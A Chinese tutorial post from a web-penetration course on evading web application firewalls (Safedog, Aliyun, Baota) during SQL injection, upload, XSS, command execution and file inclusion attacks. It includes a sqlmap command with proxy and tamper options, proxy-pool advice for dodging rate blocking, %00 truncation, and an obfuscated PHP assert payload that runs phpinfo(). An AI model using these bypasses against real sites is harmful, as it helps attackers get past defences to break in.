zoukankan      html  css  js  c++  java
  • 49:WAF绕过-漏洞利用之注入上传跨站等绕过

    思维导图

    1、SQL注入

    如需sqlmap注入测试,

    • 防cc拦截:修改user-agent头+代理(付费代理池)
      • 修改user-agent头:
        • (1)加参数:--random-agent 
        • (2)加参数:--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
          • 各大搜索引擎的User-Agent:https://www.cnblogs.com/iack/p/3557371.html
        • (3)修改配置文件sqlmap.conf中的agent变量值
      • 加代理:--proxy="http:tps123.kdlapi.com:15818"
    • 绕过安全狗:自写tamper模块,参考如下waf-dog.py
    • 绕过Aliyun:基本修改指纹即可(修改user-agent头)
    • 绕过宝塔:匹配关键字外加/*等
    python sqlmap.py -u "http://test.xiaodi8.com/sqlilabs/Less-2/?id=1" --proxy="http:tps123.kdlapi.com:15818" --tamper="waf-dog.py" --random-agent
    

    waf-dog.py:

    0

    在买了宝塔付费产品后,过狗的payload中含有/*的都会被宝塔拦截。

    image-20210517221415401

    可以使用%00截断来绕过。

    修改脚本,在使用/*的时候在前面加上%00

    image-20210517221509319

    另外,抓包查看sqlmap的指纹如下,会被waf拦截,所以需要修改us头。

    2、文件上传

    1.php 截断,参考之前payload上传,绕过waf

    和前面文件上传专题的绕过方法一样。

    3、XSS跨站

    利用xss trike绕过,加上--timeout或者--proxy绕过cc

    4、RCE执行

    加密编码绕过?算法可逆?关键字绕过?提交方法?各种测试?

    txt=$y=str_replace('x','','pxhpxinxfo()');assert($y);&submit=%E6%8F%90%E4%BA%A4ce

    测试,通过。

    0
    5、文件包含

    以下几种:.. ..../ ...等

     
    涉及资源:

    参考:https://www.cnblogs.com/darkerg/p/14779017.html

  • 相关阅读:
    假设的立场
    Win32资源的使用
    printf()可变域宽输出
    C语言qsort()函数
    OSG-VS2013-X64编译
    Windows下64位SQLite3.10动态库编译
    linux常用命令-个人收藏
    MongoDB3.0安装
    nginx+fastcgi+spawn-fcgi
    linux中codeblocks程序编译运行后不出现控制台窗口
  • 原文地址:https://www.cnblogs.com/zhengna/p/15163587.html
Copyright © 2011-2022 走看看